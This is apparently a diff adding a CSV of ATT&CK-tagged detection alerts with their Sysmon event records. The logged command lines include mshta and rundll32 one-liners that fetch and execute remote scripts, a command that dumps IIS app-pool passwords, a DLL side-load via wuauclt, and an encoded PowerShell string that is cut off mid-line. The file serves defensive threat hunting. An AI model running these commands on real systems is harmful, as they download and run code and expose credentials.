+ 0
+ 0x8000000000000000
+
+
+ 2164913
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2020-10-05 22:28:20.529
+ 00247C92-9E04-5F7B-0000-0010CF98272C
+ 12876
+ C:\Windows\System32\cmd.exe
+ 10.0.18362.449 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "C:\windows\system32\cmd.exe"
+ C:\windows\system32\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-8C36-5F75-0000-002034E39103
+ 0x391e334
+ 2
+ High
+ SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 00247C92-9E03-5F7B-0000-0010A645272C
+ 20228
+ C:\Windows\System32\mmc.exe
+ "C:\Windows\System32\mmc.exe" WF.msc
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969966.981641,2019-05-27T19:12:46.981641+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 6177
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 15:12:45.437
+ 365ABB72-FE6D-5CEB-0000-0010122D0C00
+ 1636
+ C:\Windows\System32\wbem\WMIC.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ WMI Commandline Utility
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 365ABB72-7B40-5CEC-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443
+ 365ABB72-FE6D-5CEB-0000-0010332A0C00
+ 3876
+ C:\Windows\System32\cmd.exe
+ cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424175
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:21.693
+ 747F3D96-51FD-5F93-0000-00103B425E00
+ 7504
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51F9-5F93-0000-0010551E5E00
+ 9116
+ C:\Windows\SysWOW64\rundll32.exe
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4904
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:18.451
+ 747F3D96-661E-5D3F-0000-00107F248700
+ 3164
+ C:\Windows\System32\mshta.exe
+ 11.00.17763.1 (WinBuild.160101.0800)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F
+ 747F3D96-661E-5D3F-0000-0010A3148700
+ 776
+ C:\Windows\System32\cmd.exe
+ cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243527
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.682
+ 747F3D96-9F61-5E75-0000-001059841E00
+ 8076
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 424175
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-10-23 21:58:21.693
+ 747F3D96-51FD-5F93-0000-00103B425E00
+ 7504
+ C:\Windows\SysWOW64\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-4690-5F93-0000-002019A60800
+ 0x8a619
+ 1
+ Medium
+ SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B
+ 747F3D96-51F9-5F93-0000-0010551E5E00
+ 9116
+ C:\Windows\SysWOW64\rundll32.exe
+ "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4126
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 15:32:57.276
+ 365ABB72-1A29-5CE4-0000-00107BE42101
+ 2920
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-1A29-5CE4-0000-001054E32101
+ 1532
+ C:\Windows\System32\cmd.exe
+ cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting Mshta,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4904
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-29 21:33:18.451
+ 747F3D96-661E-5D3F-0000-00107F248700
+ 3164
+ C:\Windows\System32\mshta.exe
+ 11.00.17763.1 (WinBuild.160101.0800)
+ Microsoft (R) HTML Application host
+ Internet Explorer
+ Microsoft Corporation
+ mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-6053-5D3F-0000-002082314100
+ 0x413182
+ 1
+ High
+ SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F
+ 747F3D96-661E-5D3F-0000-0010A3148700
+ 776
+ C:\Windows\System32\cmd.exe
+ cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243527
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.682
+ 747F3D96-9F61-5E75-0000-001059841E00
+ 8076
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564845391.87585,2019-08-03T19:16:31.875850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5536
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-08-03 15:16:31.676
+ 747F3D96-A54F-5D45-0000-0010D83FA101
+ 1716
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe"
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-56A3-5D45-0000-0020B3D31800
+ 0x18d3b3
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-A54F-5D45-0000-0010C429A101
+ 6080
+ C:\Windows\System32\dllhost.exe
+ C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4126
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 15:32:57.276
+ 365ABB72-1A29-5CE4-0000-00107BE42101
+ 2920
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-1A29-5CE4-0000-001054E32101
+ 1532
+ C:\Windows\System32\cmd.exe
+ cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,Critical,"Found User (LAPTOP-JU4M3I0E\bouss) run Suspicious PowerShell commands that include (powershell,.cmd) in event with Command Line (powershell.exe start-process notepad.exe) and Parent Image :C:\Windows\SysWOW64\cmd.exe , Parent CommandLine ("C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd) in directory : ( C:\Users\bouss\source\repos\blabla\blabla\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 2429138
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2021-01-26 13:21:14.021
+ 00247C92-174A-6010-0000-0010C0B2D92E
+ 18548
+ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
+ 10.0.18362.1 (WinBuild.160101.0800)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ PowerShell.EXE
+ powershell.exe start-process notepad.exe
+ C:\Users\bouss\source\repos\blabla\blabla\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-5082-600D-0000-0020A246F726
+ 0x26f746a2
+ 5
+ Medium
+ SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A
+ 00247C92-1749-6010-0000-0010EFAAD92E
+ 23168
+ C:\Windows\SysWOW64\cmd.exe
+ "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243527
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:17.682
+ 747F3D96-9F61-5E75-0000-001059841E00
+ 8076
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1602619902.353945,2020-10-14T00:11:42.353945+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 2196443
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ LAPTOP-JU4M3I0E
+
+
+
+
+
+ 2020-10-13 20:11:42.277
+ 00247C92-09FE-5F86-0000-0010AD861401
+ 7648
+ C:\Windows\System32\cmd.exe
+ 10.0.18362.449 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ c:\windows\system32\cmd.exe
+ c:\Windows\System32\
+ LAPTOP-JU4M3I0E\bouss
+ 00247C92-DE70-5F85-0000-002059F80600
+ 0x6f859
+ 1
+ Medium
+ SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 00247C92-09FE-5F86-0000-001051841401
+ 1716
+ C:\Windows\System32\wuauclt.exe
+ wuauclt.exe /UpdateDeploymentProvider C:\ProgramData\Intel\helpa.dll /RunHandlerComServer
+
+",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4126
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-21 15:32:57.276
+ 365ABB72-1A29-5CE4-0000-00107BE42101
+ 2920
+ C:\Windows\System32\rundll32.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+ C:\Users\IEUser\Desktop\
+ IEWIN7\IEUser
+ 365ABB72-39CC-5CE3-0000-002096C70000
+ 0xc796
+ 1
+ High
+ SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238
+ 365ABB72-1A29-5CE4-0000-001054E32101
+ 1532
+ C:\Windows\System32\cmd.exe
+ cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920558.5225,2019-05-27T05:29:18.522500+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 5928
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-27 01:29:18.472
+ 365ABB72-3D6E-5CEB-0000-0010CC99FF00
+ 344
+ C:\Windows\System32\inetsrv\appcmd.exe
+ 7.5.7600.16385 (win7_rtm.090713-1255)
+ Application Server Command Line Admin Tool
+ Internet Information Services
+ Microsoft Corporation
+ "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password
+ C:\Windows\Temp\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-B26B-5CEA-0000-002023240800
+ 0x82423
+ 0
+ High
+ SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45
+ 365ABB72-3D4A-5CEB-0000-0010FA93FD00
+ 2584
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvA